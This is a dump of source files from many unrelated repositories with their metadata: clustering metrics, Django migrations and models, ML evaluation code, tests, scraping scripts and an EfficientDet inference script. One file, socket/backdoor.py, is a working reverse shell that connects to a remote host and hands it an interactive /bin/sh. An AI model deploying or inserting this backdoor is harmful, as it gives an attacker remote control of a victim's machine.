b0140e72078c2d355dadca3442139240028b1641 | d6d6e3bebfca91ae10d1a269ec7d060a6bf3c8cd | /RMB_Classify/__init__.py | f0fbf238946ec3f152a96441fbb9ccf096fb845b | [] | no_license | darrenzhang1007/PyTorch_From_Zero_To_One | a1bb939cafd546e4625b0df0123c0f86d2af6499 | b94e1cca2e28fb22accd2eee859d13e9e7bc25f2 | refs/heads/master | 2022-10-17T03:53:42.388743 | 2020-06-11T07:54:33 | 2020-06-11T07:54:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | # -*- coding: utf-8 -*-
# @Time : 2020/5/4 14:45
# @Author : DarrenZhang
# @FileName: __init__.py.py
# @Software: PyCharm
# @Blog :https://www.yuque.com/darrenzhang
| [
"785320051@qq.com"
] | 785320051@qq.com |
04e8f3ab6547419999cee7969b5d8df80d311730 | 81f9ba9d4ddf45d865f5bc23d4c61de13476d64d | /irm/rand.py | dfea41fae06b988f881d8d9ad08ced07c7941c61 | [] | no_license | ericmjonas/netmotifs | cad6e2baf12cb218e15e02e5e362ef0b609978c3 | 94e1df8895b6a4f2e45ab0e918b1eb3ed16fca99 | refs/heads/master | 2020-12-25T16:49:28.618393 | 2016-08-11T00:50:30 | 2016-08-11T00:50:30 | 10,423,525 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,774 | py | import numpy as np
import scipy
import scipy.misc
from nose.tools import *
#import pyximport; pyximport.install()
#import fastrand
def canonicalize_assignment_vector(x):
"""
Take in an assignment vector and redo the assignments such that
the assignment values are monotonic from 0 to GRPMAX
"""
u = np.unique(x)
lut = {}
for ui, u in enumerate(u):
lut[u] = ui
res_vector = np.zeros_like(x)
for xi, xv in enumerate(x):
res_vector[xi] = lut[xv]
return res_vector
def assignment_vector_to_list_of_sets(x):
"""
"""
u = np.unique(x)
lut = {}
for ui, u in enumerate(x):
if u not in lut:
lut[u] = set()
lut[u].add(ui)
# turn into list
return lut.values()
def compute_adj_rand_index(ground_truth_partition, found_partition):
'''
Computes the adjusted rand index of the groups in the found partition as
compared to the ground truth partition. Both partitions should be a
canonical mapping such that
partition[i] = group containing item i (None if in no group)
'''
assert len(ground_truth_partition) == len(found_partition)
# replace any Nones with the next available group id
no_assignment_id = max(ground_truth_partition + found_partition) + 1
for part in [ground_truth_partition, found_partition]:
for i in range(len(part)):
if part[i] == None:
part[i] = no_assignment_id
assert all([x != None for x in found_partition])
assert all([x != None for x in ground_truth_partition])
num_ground_truth_groups = len(set(ground_truth_partition))
num_found_groups = len(set(found_partition))
# These two edge cases cause a divide-by-zero error if the ground truth
# and found partitions are identical. Don't bother to calculate.
if (((num_found_groups == 1) and (num_ground_truth_groups == 1))
or ((num_found_groups == len(ground_truth_partition))
and num_ground_truth_groups == len(ground_truth_partition))):
return 1.0
contingency_table = np.zeros((num_found_groups,
num_ground_truth_groups))
for item, gt_group in enumerate(ground_truth_partition):
found_group = found_partition[item]
contingency_table[found_group, gt_group] += 1
# For more details on this algorithm (since this code is not the most
# readable or best named ever), see
# http://faculty.washington.edu/kayee/pca/supp.pdf
# or http://en.wikipedia.org/wiki/Adjusted_rand_index
all_entries = np.sum(scipy.misc.comb(contingency_table, 2))
rows_collapsed = np.sum(scipy.misc.comb(np.sum(contingency_table, 0), 2))
cols_collapsed = np.sum(scipy.misc.comb(np.sum(contingency_table, 1), 2))
num_items = scipy.misc.comb(len(ground_truth_partition), 2)
ari = ( (all_entries - (rows_collapsed * cols_collapsed / num_items))
/ ( ((rows_collapsed + cols_collapsed) / 2)
- ((rows_collapsed * cols_collapsed) / num_items)))
assert not np.isnan(ari)
return ari
def test_ari():
assert_almost_equal(compute_adj_rand_index([0, 0, 0, 1, 1, 1,2,2,2],
[1, 1, 1, 2, 2, 2, 0, 0, 0]),
1.0, 2)
def twocomb(x):
"""
compute binom(x, 2)
"""
return x*(x-1) / 2.
def compute_adj_rand_index_fast(list_of_sets_U, list_of_sets_V):
a_i = np.array([len(x) for x in list_of_sets_U])
b_i = np.array([len(x) for x in list_of_sets_V])
ctable = np.zeros((len(list_of_sets_U), len(list_of_sets_V)),
dtype=np.uint32)
for ui, u in enumerate(list_of_sets_U):
for vi, v in enumerate(list_of_sets_V):
ctable[ui, vi] = len(u & v)
all_entries = np.sum(twocomb(np.array(ctable.flat)))
aisum = np.sum(twocomb(a_i))
bjsum = np.sum(twocomb(b_i))
sc =twocomb(np.sum(a_i))
num = float(all_entries) - (aisum * bjsum / sc)
den = 0.5 * (aisum + bjsum) - (aisum * bjsum / sc)
return num/den
def create_data(groups, rows_per_group):
data = range(groups) * rows_per_group
dataa = np.array(data, dtype=np.uint32)
return np.random.permutation(dataa)
def test_rands():
for groups in [10, 100, 500]:
for rows_per_group in [10, 50, 100]:
d1 = create_data(groups, rows_per_group)
d2 = create_data(groups, rows_per_group)
s1 = assignment_vector_to_list_of_sets(d1)
s2 = assignment_vector_to_list_of_sets(d2)
r1 = compute_adj_rand_index_fast(s1, s2)
r2 = fastrand.compute_adj_rand(d1, d2)
assert_almost_equal(r1, r2, 2)
def compute_similarity_stats(c1, c2):
"""
Compute the similarity statistics for two clusterings
"""
assert len(c1) == len(c2)
N = len(c1)
n_00 = 0
n_01 = 0
n_10 = 0
n_11 = 0
for i1 in range(N):
for i2 in range(N):
if i1 == i2:
continue
a1_c1 = c1[i1]
a2_c1 = c1[i2]
a1_c2 = c2[i1]
a2_c2 = c2[i2]
if a1_c1 == a2_c1 and a1_c2 == a2_c2:
n_11 +=1
elif a1_c1 != a2_c1 and a1_c2 != a2_c2:
n_00 += 1
elif a1_c1 == a2_c1 and a1_c2 != a2_c2:
n_10 += 1
elif a1_c1 != a2_c1 and a1_c2 == a2_c2:
n_01 += 1
return {'n00' : n_00/2,
'n01' : n_01/2,
'n10' : n_10/2,
'n11' : n_11/2}
def compute_jaccard(c1, c2):
ss = compute_similarity_stats(c1, c2)
return float(ss['n11']) / (ss['n11'] + ss['n01'] + ss['n10'])
| [
"jonas@ericjonas.com"
] | jonas@ericjonas.com |
1622c61f3561205e500f996c1495c710ed2f07a5 | 2c19ad0d69a20b2ef82312cdba65fc538c85efe7 | /User/migrations/0006_auto_20190508_1602.py | 4bade3d38cca0e363c3355dd7401f748ed5a9505 | [] | no_license | wzc-ob/EvaluationOfTeaching | b55d1011ca0f36d3af5e32efae85fa251e90fd79 | 783cbd35708db2121566cb27826db3c6654f0871 | refs/heads/master | 2020-06-06T22:40:25.494991 | 2019-06-20T07:06:11 | 2019-06-20T07:06:11 | 192,867,926 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,090 | py | # Generated by Django 2.1.5 on 2019-05-08 08:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('User', '0005_auto_20190508_1514'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='birthday',
field=models.DateField(default='1969-02-02'),
),
migrations.AddField(
model_name='teacher',
name='img',
field=models.ImageField(blank=True, default='nopic.jpg', upload_to='files'),
),
migrations.AddField(
model_name='teacher',
name='name',
field=models.CharField(default='王老师', max_length=12),
),
migrations.AddField(
model_name='teacher',
name='sex',
field=models.CharField(default='男', max_length=3),
),
migrations.AddField(
model_name='teacher',
name='telephone',
field=models.CharField(default='18772815717', max_length=11),
),
]
| [
"43775612+wzc-ob@users.noreply.github.com"
] | 43775612+wzc-ob@users.noreply.github.com |
04b2d5f6e25fe54559d1a0d6cc931d0a0e294d04 | 97504159dcdacaef31a81abc2ee326ed95fa8ee3 | /models/order_discount_model.py | 5f50a8797644f858a03f2ab10984300ff90f50d9 | [] | no_license | argeweb/plugin-order | 4200857afe3a45e7d96dd4f5b13c9fe7ecc992b4 | b95882c90e9fe8128834c63ca2ae1ea3b4b14ebe | refs/heads/master | 2020-02-26T15:06:46.883725 | 2018-03-30T01:28:05 | 2018-03-30T01:28:05 | 83,565,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created with YooLiang Technology (侑良科技).
# Author: Qi-Liang Wen (温啓良)
# Web: http://www.yooliang.com/
# Date: 2017/3/1.
import time
from argeweb import BasicModel
from argeweb import Fields
from order_model import OrderModel
class OrderDiscountModel(BasicModel):
order = Fields.KeyProperty(verbose_name=u'訂單', kind=OrderModel)
title = Fields.StringProperty(verbose_name=u'折扣說明', default=u'')
amount = Fields.FloatProperty(verbose_name=u'折扣金額', default=0.0)
@classmethod
def all_with_order(cls, order=None, *args, **kwargs):
return cls.query(cls.order==order.key).order(-cls.sort)
| [
"cwen0708@gmail.com"
] | cwen0708@gmail.com |
e6114b117e16485b2ed7dabbdbb936f25a0133aa | 2e7bf2c172b59e7f6fb358bc73687b738e1dbed3 | /python/interpret/perf/regression.py | 612c6920121ba61286fed23152b0aba5a915a189 | [
"MIT"
] | permissive | rodrigovssp/interpret | 58ec3a01a3621421e0b60aee76df282d11dcf48b | dbd0e2dd616f963c14184ea6ec442bacd8d92400 | refs/heads/master | 2020-07-20T17:19:55.161052 | 2019-11-22T01:28:17 | 2019-11-22T01:28:17 | 206,683,287 | 1 | 0 | MIT | 2019-09-06T00:54:48 | 2019-09-06T00:54:48 | null | UTF-8 | Python | false | false | 2,998 | py | # Copyright (c) 2019 Microsoft Corporation
# Distributed under the MIT software license
from ..api.base import ExplainerMixin, ExplanationMixin
from ..utils import unify_data, gen_name_from_class, unify_predict_fn
from sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score
import numpy as np
class RegressionPerf(ExplainerMixin):
available_explanations = ["perf"]
explainer_type = "perf"
def __init__(self, predict_fn, feature_names=None, feature_types=None, **kwargs):
self.predict_fn = predict_fn
self.kwargs = kwargs
self.feature_names = feature_names
self.feature_types = feature_types
def explain_perf(self, X, y, name=None):
if name is None:
name = gen_name_from_class(self)
X, y, self.feature_names, self.feature_types = unify_data(
X, y, self.feature_names, self.feature_types
)
predict_fn = unify_predict_fn(self.predict_fn, X)
scores = predict_fn(X)
mse = mean_squared_error(y, scores)
rmse = np.sqrt(mse)
mae = mean_absolute_error(y, scores)
r2 = r2_score(y, scores)
residuals = y - scores
# abs_residuals = np.abs(y - scores)
counts, values = np.histogram(residuals, bins="doane")
overall_dict = {
"type": "perf_curve",
"density": {"names": values, "scores": counts},
"scores": scores,
"mse": mse,
"rmse": rmse,
"mae": mae,
"r2": r2,
"residuals": residuals,
}
internal_obj = {"overall": overall_dict, "specific": None}
return RegressionExplanation(
"perf",
internal_obj,
feature_names=self.feature_names,
feature_types=self.feature_types,
name=name,
)
class RegressionExplanation(ExplanationMixin):
explanation_type = None
def __init__(
self,
explanation_type,
internal_obj,
feature_names=None,
feature_types=None,
name=None,
selector=None,
):
self.explanation_type = explanation_type
self._internal_obj = internal_obj
self.feature_names = feature_names
self.feature_types = feature_types
self.name = name
self.selector = selector
def data(self, key=None):
if key is None:
return self._internal_obj["overall"]
return None
def visualize(self, key=None):
from ..visual.plot import plot_density
data_dict = self.data(key)
if data_dict is None:
return None
rmse = data_dict["rmse"]
r2 = data_dict["r2"]
title = "{0} <br> RMSE = {1:.2f}" + " | R<sup>2</sup> = {2:.2f}"
title = title.format(self.name, rmse, r2)
density_fig = plot_density(
data_dict["density"], title=title, xtitle="Residuals", ytitle="Density"
)
return density_fig
| [
"interpretml@outlook.com"
] | interpretml@outlook.com |
90f6c43e4d795ce0d9d1b36dac534bc62b5b7896 | 06ff4c9b61578823f7fac8d52b67ea0dbaf69665 | /bic_index/__init__.py | cd87dd7dff0ad3ca7aef0f0416d57d911d7f2c9d | [
"MIT"
] | permissive | horta/bic-index | 671e4b2fd14f52ce0ac46b41db62bd257bf93d1a | 849a52812d6e8ed1c23ffa20e5199711ce809aa2 | refs/heads/master | 2020-06-01T11:31:15.376758 | 2019-06-09T13:54:05 | 2019-06-09T13:54:05 | 190,764,476 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | """
Biclustering indices
Similarity measures for comparing biclustering solutions.
"""
from ._anne import anne_rnia
from ._ayadi import ayadi
from ._bozdag import bozdag_extra, bozdag_uncovered
from ._csi import csi
from ._ebc import ebc
from ._eren import eren_recovery, eren_relevance
from ._error import biclustering_error
from ._fabia import fabia
from ._lew import lew
from ._prelic import prelic_recovery, prelic_relevance
from ._stmaria import stmaria
from ._testit import test
from ._w import wdic, wjac
__version__ = "0.0.1"
__all__ = [
"__version__",
"anne_rnia",
"ayadi",
"biclustering_error",
"bozdag_extra",
"bozdag_uncovered",
"csi",
"ebc",
"eren_recovery",
"eren_relevance",
"fabia",
"lew",
"prelic_recovery",
"prelic_relevance",
"stmaria",
"test",
"wdic",
"wjac",
]
| [
"danilo.horta@gmail.com"
] | danilo.horta@gmail.com |
a685bf18fd3fee1b3518a28a9032d2900d823215 | beb9ac9ed895b375fbea240bf7d56281d6a0a481 | /20200720/test6.py | 77549574c1392e64ab03417146f5243dce61a00d | [] | no_license | MinjeongSuh88/python_workspace | 5b0c7e2a7b3543e65df1f07066e4a52f23294ac5 | b13afdc8cf4e42496fa2b5c8df3c5effc7f7488d | refs/heads/master | 2022-11-30T11:05:52.347243 | 2020-08-14T09:04:42 | 2020-08-14T09:04:42 | 285,185,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # 사용자로부터 국어, 수학, 영어 점수를 입력받아 합계, 평균을 구하고 등급 매기기
kor,mat,eng=input("국어, 수학, 영어 점수를 입력하시오").split()
total=int(kor)+int(mat)+int(eng)
ave=total/3
print(total, ave)
if ave >= 90:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 A')
elif ave >= 80:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 B')
elif ave >= 70:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 C')
elif ave >= 60:
print('총점 :',total,', 평균 :',ave,', 당신의 학점은 D')
else:
print('당신의 학점은')
| [
"69196506+MinjeongSuh88@users.noreply.github.com"
] | 69196506+MinjeongSuh88@users.noreply.github.com |
a93dd5b8d10a589e061e9b9519f5ca1f58befe2b | f3c33b6a9270d53d8cb657f3bb1912938edd6c39 | /js/nextdates.py | d6fcf479b41e02b430d8f336e95e214d388389eb | [] | no_license | ivanteoh/sypy.github.com | 5742685c2ab9a740623ae58851946bc278b16499 | 31487a991143eea26d37ec23e7915a6d86dbd834 | refs/heads/master | 2021-01-24T21:08:21.060830 | 2015-09-03T05:52:16 | 2015-09-03T05:52:16 | 39,477,784 | 0 | 0 | null | 2015-07-22T01:06:26 | 2015-07-22T01:06:25 | null | UTF-8 | Python | false | false | 685 | py | from datetime import datetime
import calendar
import math
now = datetime.now()
def next_date(week, day_of_week):
year, month = (now.year, now.month)
day = calendar.monthcalendar(now.year, now.month)[week][day_of_week]
if now.day > day:
year = int(2014 + math.floor(11/12))
month = now.month % 12 + 1
day = calendar.monthcalendar(year, month)[week][day_of_week]
return datetime(year, month, day, 18, 30)
nights = [('SyPy', 0, 3), ('Hacknight', 2, 1), ('SyDjango', 3, 3)]
for date, event in sorted([(next_date(week, day), event) for event, week, day in nights]):
print("Next %s:\t%s" % (event, date))
# developed at hacknight 2014-10-16
| [
"software@pretaweb.com"
] | software@pretaweb.com |
7fc29cf7195d9833782774d8fc92c5bddf59e5ae | 0b0ba6de1808c4214ccb1f39077c7f59d939b059 | /python/samples/hhAnalyzeSamples_2016_nanoAOD_sync.py | 03b0a86398c5cf82c9b412f064342c938225c0db | [] | no_license | HEP-KBFI/hh-bbww | b1e434994764d294459208e7515d4e8ad29b3ecd | 7e03769356d21bfe3597d2e0cba7ceeb2a73e62c | refs/heads/master | 2023-04-30T16:12:26.824547 | 2023-04-24T17:38:02 | 2023-04-24T17:38:02 | 149,094,236 | 2 | 4 | null | 2022-09-09T10:59:47 | 2018-09-17T08:37:12 | Python | UTF-8 | Python | false | false | 2,101 | py | from collections import OrderedDict as OD
# file generated at 2020-03-03 10:45:15 with the following command:
# create_dictionary.py -m python/samples/metaDict_2016_hh_sync.py -p /local/karl/sync_ntuples/2016/nanoAODproduction/2019Dec06 -N samples_2016 -E 2016 -o python/samples -g hhAnalyzeSamples_2016_nanoAOD_sync.py -M
samples_2016 = OD()
samples_2016["/GluGluToRadionToHHTo2B2VTo2L2Nu_M-750_narrow_13TeV-madgraph-v2/RunIISummer16MiniAODv3-PUMoriond17_94X_mcRun2_asymptotic_v3-v2/MINIAODSIM"] = OD([
("type", "mc"),
("sample_category", "signal"),
("process_name_specific", "signal_ggf_spin0_750_hh_2b2v"),
("nof_files", 1),
("nof_db_files", 3),
("nof_events", {
}),
("nof_tree_events", 144981),
("nof_db_events", 298727),
("fsize_local", 361661929), # 361.66MB, avg file size 361.66MB
("fsize_db", 13966996917), # 13.97GB, avg file size 4.66GB
("use_it", True),
("xsection", 0.027654),
("genWeight", True),
("triggers", ['1e', '1mu', '2e', '2mu', '1e1mu', '3e', '3mu', '2e1mu', '1e2mu', '1e1tau', '1mu1tau', '2tau']),
("has_LHE", True),
("nof_PSweights", 1),
("LHE_set", "LHA IDs 262000 - 262100 -> NNPDF30_lo_as_0130 PDF set, expecting 101 weights (counted 101 weights)"),
("nof_reweighting", 0),
("local_paths",
[
OD([
("path", "/local/karl/sync_ntuples/2016/nanoAODproduction/2019Dec06/signal_ggf_spin0_750_hh_2b2v"),
("selection", "*"),
("blacklist", []),
]),
]
),
("missing_completely", [
# not computed
]),
("missing_from_superset", [
# not computed
]),
("missing_hlt_paths", [
]),
("hlt_paths", [
# not computed
]),
])
samples_2016["sum_events"] = [
]
| [
"karlehataht@gmail.com"
] | karlehataht@gmail.com |
f65ac26d969168699050a86ebdd004165c00bad7 | 017ca2cfff50c9bb4865cba3ae6e765b4df83190 | /tests/test_app.py | 7548042caac5fea22c56b64e581544f1ffb4d90b | [] | no_license | cjrh/venus | d011bebb3185107d6ac326a03a2b4fad258a4e42 | 961287ea4fcaa80bf67371df9b6588155ef625a8 | refs/heads/master | 2021-06-11T08:18:15.648241 | 2021-04-23T05:08:31 | 2021-04-23T05:08:31 | 178,842,174 | 0 | 0 | null | 2021-04-23T05:08:33 | 2019-04-01T10:43:46 | Python | UTF-8 | Python | false | false | 2,926 | py | import asyncio
import os
import signal
import subprocess as sp
import sys
import time
from pprint import pprint
from uuid import uuid4
import biodome
import portpicker
import pytest
from asyncpg import Connection
def cross_platform_process_terminator(proc: sp.Popen):
if sys.platform == 'win32':
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGTERM)
def cross_platform_creation_flags():
if sys.platform == 'win32':
return sp.CREATE_NEW_PROCESS_GROUP
else:
return 0
@pytest.fixture(scope='module')
def venus_runner(db_fixture):
"""This is the venus application"""
port = portpicker.pick_unused_port()
env = {**os.environ, **{k: str(v) for k, v in dict(MAX_BATCH_SIZE=1).items()}}
proc = sp.Popen(['venus', '--zmqport', str(port)], env=env,
creationflags=cross_platform_creation_flags())
try:
yield proc, port
finally:
print('Killing venus')
cross_platform_process_terminator(proc)
try:
proc.wait(timeout=2.0)
except sp.TimeoutExpired:
print('Process did not shutdown in 2 seconds. Killing.')
proc.kill()
def run_app(port, iterations, delay=0.2, env=None):
"""This is a fake microservice"""
if env:
env = {**os.environ, **env}
proc = sp.Popen([f'{sys.executable}', 'tests/sender.py',
'-p', f'{port}',
'-i', f'{iterations}',
'-d', f'{delay}'
], env=env,
creationflags=cross_platform_creation_flags(),
)
return proc
def test_send_logs(db_fixture, db_pool_session, venus_runner):
proc_venus, port = venus_runner
# Give it a moment to start up
time.sleep(1)
message_uuids = [str(uuid4()) for i in range(10)]
env = dict(SENDER_ITEMS=str(message_uuids))
with biodome.env_change('MAX_BATCH_SIZE', 1):
proc_app = run_app(port, iterations=10, env=env)
try:
proc_app.wait(10)
except sp.TimeoutExpired:
print('Fake app still not finished. Killing.')
cross_platform_process_terminator(proc_app)
# Fetch records from the DB to verify that the log messages arrived.
async def get():
# Cannot use the db_pool fixture, because it mutates the
# db.DATABASE_POOL global, which is what main.amain *also* does.
async with db_pool_session.acquire() as conn:
conn: Connection
return await conn.fetch('SELECT * FROM logs')
loop = asyncio.get_event_loop()
records = loop.run_until_complete(get())
pprint(records)
logged_message_ids = {r['message'] for r in records}
print('logged:', logged_message_ids)
print('expected:', message_uuids)
assert logged_message_ids.issuperset(message_uuids)
| [
"caleb.hattingh@gmail.com"
] | caleb.hattingh@gmail.com |
2bdafa18c0708627394a434ab0414269d1abe63d | 6045075c734d65a3cec63d3ae15f8f9f13836559 | /solutions/0397_Integer_Replacement/math.py | 32709a4dc2322dd0c95365874f0fdffd2ecbb39f | [] | no_license | zh-wang/leetcode | c058470fdf84fb950e3d4f974b27826718942d05 | 6322be072e0f75e2da28b209c1dbb31593e5849f | refs/heads/master | 2021-12-28T02:49:11.964213 | 2021-08-25T06:29:21 | 2021-08-25T06:29:21 | 189,919,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | class Solution:
def integerReplacement(self, n: int) -> int:
cnt = 0
while n > 1:
if n % 2 == 0: # half n when n is even
n >>= 1
# every odd integer mod 4 is either 1 or 3
elif n == 3 or n % 4 == 1:
n -= 1
else:
n += 1
cnt += 1
return cnt
| [
"viennakanon@gmail.com"
] | viennakanon@gmail.com |
0ad82150a6438039d05ec42973e02c3791d07064 | 3a48e3469239ce17b4f01b98b85e052faf137ab0 | /unittestdemo/test_testloader.discover.py | 1086acda8b46cc3522d0fdd845a26cb5cd4708b6 | [] | no_license | langdawang678/Py | 3b6887bb7840ec73ee750e69f5c0f2988730746d | 7f0863a245fc51a1dd07d2c8954eac67b55daac2 | refs/heads/master | 2021-07-17T22:03:01.177913 | 2021-07-14T14:01:16 | 2021-07-14T14:01:16 | 174,823,049 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | """
演示unittest.TestLoader().discover()方法
测试用例执行步骤
1、初始化加载器,testloader=unittest.TestLoader()
2、查找测试用例,suite=testloader.discover(文件夹,默认test开头) # 也可'test*.py'
还有其他加载的方式:
3、打开一个文件,用于存放text报告
4、初始化运行器,runner = unittest.TextTestRunner(文件)
5、运行运行器, runner.run(suite)
"""
import unittest
testLoader = unittest.TestLoader()
suite = testLoader.discover(".", "test_math*.py")
print(suite)
if __name__ == '__main__':
with open("TextTestRunner_test_math*.py.txt", "w") as f:
runner = unittest.TextTestRunner(f, verbosity=2)
runner.run(suite)
| [
"langdawang678@sina.com"
] | langdawang678@sina.com |
e7c8acf1628cb0f95a00e249c40a5288e89d5d03 | f75f841a1e0e6e7915a68bebbed7233aa5d22625 | /socket/backdoor.py | b84991ed8a2899792ba542f4637c60bd9e3500f5 | [
"MIT"
] | permissive | Akagi201/learning-python | 4c1aa72116cdfea527fdf2afd038158e5ba7f97b | 28169d1bf0488e8be1456b40dd39d7830a65280e | refs/heads/master | 2022-12-08T01:25:57.842615 | 2022-03-14T08:02:20 | 2022-03-14T08:02:20 | 32,675,802 | 89 | 126 | MIT | 2022-11-24T18:20:28 | 2015-03-22T13:04:01 | Python | UTF-8 | Python | false | false | 501 | py | # coding=utf-8
# run:
# nc -l 8888
# python 127.0.0.1 8888
import socket, subprocess, os, sys
if len(sys.argv) < 3:
print("Usage: python xxx.py ip port")
exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
# IP: sys.argv[1], the remote host
# PORT: sys.argv[2], the same port as used by the server
s.connect((sys.argv[1], int(sys.argv[2])))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
| [
"akagi201@gmail.com"
] | akagi201@gmail.com |
7cca2c1fd1067e7eb7245c0c4e8ebbd3b6f46751 | 6550cc368f029b3955261085eebbddcfee0547e1 | /第6部分-Django(哪吒,肖锋)/django-4-权限管理-肖锋/day82/day82/luffy_permission-权限信息展示/luffy_permission/rbac/urls.py | 63ffc11c1ccba1db26adec3b227b2286bd13f0ca | [] | no_license | vividyellow/oldboyeduPython14qi | d00c8f45326e16464c3d4e8df200d93779f68bd3 | de1e9f6efafa2846c068b3fe5ad6e1ca19f74a11 | refs/heads/master | 2022-09-17T21:03:17.898472 | 2020-01-31T10:55:01 | 2020-01-31T10:55:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | from django.conf.urls import url
from rbac import views
urlpatterns = [
# /app01/role/list/ # rbac:role_list
url(r'^role/list/$', views.role_list, name='role_list'),
url(r'^role/add/$', views.role, name='role_add'),
url(r'^role/edit/(\d+)$', views.role, name='role_edit'),
url(r'^role/del/(\d+)$', views.del_role, name='role_del'),
url(r'^menu/list/$', views.menu_list, name='menu_list'),
url(r'^menu/add/$', views.menu, name='menu_add'),
url(r'^menu/edit/(\d+)$', views.menu, name='menu_edit'),
]
| [
"524991368@qq.com"
] | 524991368@qq.com |
76670d6cc29244caf6a20fec00e61bbb9d6304d1 | ca68d2f60d6c05c7b51e8a1dd68e3db05a7fda39 | /pycon.jp/pyconjp-csv-dump.py | bacab7ba77de0d0f4d4be230e5a230839e0e3c3a | [] | no_license | sin-tanaka/happy-scraping | 352c10f3d6c3ff1e3074a886dd7ca0fbf9ad6064 | 84ca05ea3e5a6233897d0c77d28c861ea4c0223e | refs/heads/master | 2020-05-23T22:22:33.255888 | 2015-12-05T11:15:21 | 2015-12-05T11:15:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import bs4
import requests
url = 'https://pycon.jp/2015/ja/schedule/tutorials/list/'
res = requests.get(url)
soup = bs4.BeautifulSoup(res.text)
titles = [(elm.text, elm.get('href')) for elm in soup.select('.presentation h3 a')]
fp = open('test.csv', 'w+t')
writer = csv.writer(fp)
writer.writerows(titles)
fp.close()
| [
"takesxi.sximada@gmail.com"
] | takesxi.sximada@gmail.com |
5fe6b8d92c33a20c1ac4b997a704f1e36ae1c3a4 | b6d48defc1d5359ee351403b0906b6beb6cb64a7 | /Yet-Another-EfficientDet-Pytorch/efficientdet_test.py | 278bd08eed0241c05001b29254cbdc30c22e82a3 | [
"LGPL-3.0-only",
"Apache-2.0"
] | permissive | CrazyVertigo/SimpleCVReproduction | 2c6d2d23b0e234d976eefbdb56d6460798559b0d | 9699f600e6cde89ad0002ca552f8b6119e96990c | refs/heads/master | 2022-09-24T16:29:33.263625 | 2020-06-03T14:53:18 | 2020-06-03T14:53:18 | 269,344,314 | 1 | 0 | Apache-2.0 | 2020-06-04T11:43:10 | 2020-06-04T11:43:09 | null | UTF-8 | Python | false | false | 4,161 | py | # Author: Zylo117
"""
Simple Inference Script of EfficientDet-Pytorch
"""
import time
import torch
from backbone import EfficientDetBackbone
import cv2
import numpy as np
from efficientdet.utils import BBoxTransform, ClipBoxes
from utils.utils import preprocess, invert_affine, postprocess
compound_coef = 0
force_input_size = 1920 # set None to use default size
img_path = 'test/img.png'
threshold = 0.2
iou_threshold = 0.2
use_cuda = True
use_float16 = False
obj_list = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', '', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep',
'cow', 'elephant', 'bear', 'zebra', 'giraffe', '', 'backpack', 'umbrella', '', '', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',
'skateboard', 'surfboard', 'tennis racket', 'bottle', '', 'wine glass', 'cup', 'fork', 'knife', 'spoon',
'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut',
'cake', 'chair', 'couch', 'potted plant', 'bed', '', 'dining table', '', '', 'toilet', '', 'tv',
'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster', 'sink',
'refrigerator', '', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier',
'toothbrush']
# tf bilinear interpolation is different from any other's, just make do
input_sizes = [512, 640, 768, 896, 1024, 1280, 1280, 1536]
input_size = input_sizes[compound_coef] if force_input_size is None else force_input_size
ori_imgs, framed_imgs, framed_metas = preprocess(img_path, max_size=input_size)
x = torch.tensor(framed_imgs).cuda()
if use_cuda:
x = torch.stack([torch.from_numpy(fi).cuda() for fi in framed_imgs], 0)
else:
x = torch.stack([torch.from_numpy(fi) for fi in framed_imgs], 0)
x = x.to(torch.float32 if not use_float16 else torch.float16).permute(0, 3, 1, 2)
model = EfficientDetBackbone(compound_coef=compound_coef, num_classes=len(obj_list))
model.load_state_dict(torch.load(f'weights/efficientdet-d{compound_coef}.pth'))
model.requires_grad_(False)
model.eval()
if use_cuda:
model = model.cuda()
if use_float16:
model = model.half()
with torch.no_grad():
features, regression, classification, anchors = model(x)
regressBoxes = BBoxTransform()
clipBoxes = ClipBoxes()
out = postprocess(x,
anchors, regression, classification,
regressBoxes, clipBoxes,
threshold, iou_threshold)
def display(preds, imgs, imshow=True, imwrite=False):
for i in range(len(imgs)):
if len(preds[i]['rois']) == 0:
continue
for j in range(len(preds[i]['rois'])):
(x1, y1, x2, y2) = preds[i]['rois'][j].astype(np.int)
cv2.rectangle(imgs[i], (x1, y1), (x2, y2), (255, 255, 0), 2)
obj = obj_list[preds[i]['class_ids'][j]]
score = float(preds[i]['scores'][j])
cv2.putText(imgs[i], '{}, {:.3f}'.format(obj, score),
(x1, y1 + 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
(255, 255, 0), 1)
if imshow:
cv2.imshow('img', imgs[i])
cv2.waitKey(0)
if imwrite:
cv2.imwrite(f'test/img_inferred_d{compound_coef}_this_repo_{i}.jpg', imgs[i])
out = invert_affine(framed_metas, out)
